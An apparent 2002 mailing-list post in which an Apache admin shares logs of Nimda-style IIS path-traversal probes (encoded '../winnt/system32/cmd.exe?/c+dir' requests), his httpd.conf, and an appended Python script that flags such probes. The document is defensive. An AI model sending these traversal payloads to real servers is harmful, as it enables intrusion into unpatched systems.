Bizarre apache logs
Hi
I had some bizarre 404 entries in my apache logs. They are very rare, but it
looks as if they resulted from an attempted attack. Well, say it was a rather
lame attack, but I wonder where the 404 and 400 came from. As the server is
configured, there should be only 403 answers, as the whole http part is
closed, except for one directory and from the intranet. From the outside one
can access the server via https only.
I don't know if I have to be alerted or something, but I would feel better
if someone could check my setup, just to make sure that it is not a
misconfiguration. The server is an older Compaq Proliant 800, some Pentium
133 MHz. Rather slow, perhaps this has an influence.
Below are the error.log and access.log in question and at the end the
relevant section of the httpd.conf.
Regards
Marcel
###########################################################################
access.log: I put some newlines between the 404 and the rest of it.
80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 286 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 284 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 294 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 294 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 341 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"

80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"

80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
###########################################################################
In the error.log there are the following entries:
[Sun Sep 29 12:50:03 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
[Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/MSADC
[Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/c
[Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/d
[Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
[Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/_vti_bin
[Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/_mem_bin
[Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/msadc
[Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
[Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
[Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
[Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
[Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by server configuration: /var/www/scripts
###########################################################################
Here comes my httpd.conf
<Location />
Order allow,deny
deny from all
</Location>
<VirtualHost _default_:80>
ServerName xxx.foo.com
ServerAlias xxx.faa.com
<Location />
Order allow,deny
# allow access only from the intranet (Apache does not accept comments
# after a directive on the same line, so the comment goes on its own line)
allow from 192.x.x.0/24
AuthType Basic
AuthName "foo"
AuthLDAPBindDN "xxxxxxxxxxxxxxxxxxxxxxxx"
AuthLDAPBindPassword "xxxxxxxxxxxxxxxxxxx"
AuthLDAPUrl ldap://dddddddddddddddddddddddddddddddddddddd
require valid-user
</Location>
<Location /public>
Order allow,deny
allow from all
satisfy any
</Location>
<Location /zykadmin>
Order allow,deny
allow from 192.x.x.0/24
</Location>
<Location /servlets>
Order allow,deny
Allow from 192.x.x.0/24
</Location>
#### Servlets which are reachable via http
WebAppDeploy examples warpConnection /servlets/examples/
WebAppDeploy lagerchargen warpConnection /servlets/agauga/
</VirtualHost>
<VirtualHost _default_:443>
DocumentRoot /var/www
ServerName xxx.foo.com
ServerAlias yyy.faa.com
#### Servlets which are reachable via https
WebAppDeploy examples warpConnection /servlets/examples/
WebAppDeploy lagerchargen warpConnection /servlets/agauga/
<Location />
Order allow,deny
allow from all
AuthType Basic
AuthName "iiiiiiiiiiiii"
AuthLDAPBindDN "ooooooooooooooooooo"
AuthLDAPBindPassword "xxxxxxxxxx"
AuthLDAPUrl ldap://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
require valid-user
</Location>
<IfModule mod_ssl.c>
SSLEngine on
SSLCertificateFile /etc/apache/ssl.crt/server.crt
SSLCertificateKeyFile /etc/apache/ssl.key/server.key
# SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
</IfModule>
</VirtualHost>
--------------------
PGP / GPG Key: http://www.ncpro.com/GPG/mmweber-at-ncpro-com.asc
Reply to:
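An added example, not part of Marcel's post and not Apache's own code: a small Python triage script that runs over constructed access-log lines of the same shape as the ones quoted above and tags the reasons each request looks like an encoded path-traversal probe (the cmd.exe/root.exe sequence in the post is the well-known Nimda worm signature). It also shows where the odd status codes come from: Apache parses the request URI before any <Location> access check runs, and in that step a malformed %-escape (such as "%%35") is answered with 400 and a "%2f" that decodes to "/" is answered with 404, so those two codes are produced earlier than the 403s from "deny from all" and do not indicate that the deny was bypassed. The sample lines, tag names and the two-round decoding limit are this example's own assumptions.

```python
"""Triage Apache access-log entries for encoded path-traversal probes.

Added example, not part of the original post. The sample lines below are
constructed (modelled on the shape of the post's entries); the tags and the
decoding depth are this script's own assumptions, not anything from Apache.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log, Apache combined format, one request per line.
SAMPLE_LOG = """\
80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 286 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
192.168.1.10 - - [29/Sep/2002:13:01:00 +0200] "GET /public/index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A '%' not followed by two hex digits: Apache rejects the request with 400
# while parsing the URI, before any <Location> access check runs.
MALFORMED_ESCAPE = re.compile(r'%(?![0-9A-Fa-f]{2})')


def parse_line(line):
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['path'] = rec['uri'].split('?', 1)[0]   # drop the query string
    return rec


def decode_layers(path, rounds=2):
    """Percent-decode up to `rounds` times, stopping when nothing changes.
    Returns the successive forms, raw path first."""
    forms = [path]
    for _ in range(rounds):
        nxt = unquote(forms[-1], errors='replace')
        if nxt == forms[-1]:
            break
        forms.append(nxt)
    return forms


def classify(rec):
    """Tags describing why a request looks like a traversal probe ([] if clean)."""
    raw = rec['path']
    final = decode_layers(raw)[-1]
    tags = []
    if MALFORMED_ESCAPE.search(raw):
        tags.append('malformed-escape')      # server answers 400 during URI parsing
    if re.search(r'%2f', raw, re.I):
        tags.append('encoded-slash')         # decodes to '/': Apache answers 404 by default
    if re.search(r'%25[0-9a-f]{2}', raw, re.I):
        tags.append('double-encoded')        # '%25' hides a second escape layer
    if re.search(r'%c[01]%[0-9a-f]{2}', raw, re.I):
        tags.append('overlong-utf8')         # 0xC0/0xC1 never lead a valid UTF-8 sequence
    if '..' in final:
        tags.append('dot-dot-traversal')     # coarse check: any '..' left after decoding
    if re.search(r'(cmd|root)\.exe$', final, re.I):
        tags.append('windows-shell-target')
    return tags


def summarize(log_text):
    """Per source IP: total requests, how many were flagged, and the status
    codes the server returned for the flagged ones."""
    by_ip = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        e = by_ip.setdefault(rec['ip'], {'requests': 0, 'flagged': 0, 'status': Counter()})
        e['requests'] += 1
        if classify(rec):
            e['flagged'] += 1
            e['status'][rec['status']] += 1
    return by_ip


if __name__ == '__main__':
    for ip, e in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {e['flagged']}/{e['requests']} flagged, status {dict(e['status'])}")
```

Feeding a real access.log through summarize() gives, per source, how many requests carried any of the tags and which status codes the server answered with; a source whose flagged requests only ever receive 400, 403 and 404 was stopped by URI parsing or by the <Location> deny, which is the situation the post describes.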